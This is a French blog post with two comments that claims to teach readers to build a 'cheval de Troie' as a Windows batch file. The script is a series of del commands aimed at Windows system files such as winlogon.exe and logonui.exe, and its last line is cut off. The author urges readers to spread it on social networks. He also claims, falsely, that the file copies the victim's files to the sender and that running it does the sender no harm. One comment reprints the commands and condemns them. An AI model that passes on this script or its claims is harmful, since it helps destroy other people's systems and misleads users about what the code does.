mercredi 23 avril 2014

créer un CHEVAL DE TROIE

Aujourd'hui, je vais vous apprendre (après les virus) a faire des cheval de Troie !
IL FAUT SAVOIR QUE=Un cheval de Troie (Trojan Horse en anglais) est un logiciel d'apparence légitime, conçu pour exécuter des actions à l'insu de l'utilisateur. En général, il utilise les droits appartenant à son environnement pour détourner, diffuser ou détruire des informations, ou encore pour ouvrir une porte dérobée (fonctionnalité inconnue de l'utilisateur légitime, qui donne un accès secret au logiciel qui permet à un pirate informatique de prendre, à distance, le contrôle de l'ordinateur). Les trojans sont programmés pour être installés de manière invisible, notamment pour corrompre l'ordinateur hôte. La principale différence entre les virus, les vers et les chevaux de Troie est que ces derniers ne se répliquent pas. Ils sont divisés en plusieurs sous-classes comprenant entre autres les portes dérobées, les logiciels espions, les droppers, etc..Les chevaux de Troie informatiques tirent leur nom de la légende narrée (en Grèce ancienne) dans l'Iliade, texte homérique, à propos de la méthode utilisée par les grecs pour conquérir la ville de Troie : le héros Ulysse fait construire un immense étalon de bois qu'il place devant les portes de Troie et dans lequel il se cache avec ses compagnons. Lorsque les Troyens découvrent ce cheval ils sont persuadés qu'il s'agit d'un cadeau divin et le font entrer dans leurs murs. Une fois la nuit tombée, Ulysse et ses compagnons sortent de leur cachette et ouvrent les portes de la ville au reste de l'armée qui pille la ville et massacre les Troyens ; le premier cheval de Troie informatique se présentait comme un jeu ou une application d'apparence légitime, mais une fois installé, il endommageait en fait l'ordinateur hôte.


Maintenant que vous savez de quoi il s'agit, Passons a l'action !!! ;)
Un cheval de Troie est très très dangereux pour la victime... vous allez voir pourquoi ;D
1) aller sur le bloc note(encore???...Et bien OUI! C'est comme sa que l'on construit un Trojan _ comme les virus!)
2) Tapez se code(le trojan)
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrn
3)Enregistrer-le en .bat et finissez par l'envoyer dans des réseaux sociaux...
4)Se trojan(cheval de Troie ) copie tout les fichier du PC a la victime , et vous les donne
Donc ( une foit enregistrer, vous pourrier y cliquer ~Cela ne vous fera aucune dégât~)
Et voila !!!  Bonne journée a tous :)

2 commentaires:

  1. si on le utulise pour nous sa va nous rien faire ?

    RépondreSupprimer
  2. Tu est vraiment un connard toi, tu donne du code pour effacer les fichier système.

    del "C:\windows\pchealth\"
    del "C:\windows\system\"
    del "C:\windows\system32\restore\"
    del "winlogon.exe"
    del "C:\windows\system32\autoexec.nt"
    del "C:\windows\system32\logonui.exe"
    del "C:\windows\system32\ntoskrn

    Qui t'a appris tous ça ?

    RépondreSupprimer

le partage des astuces c'est la passion de BENNESTA.
ma preocupation c'est votre satisfaction.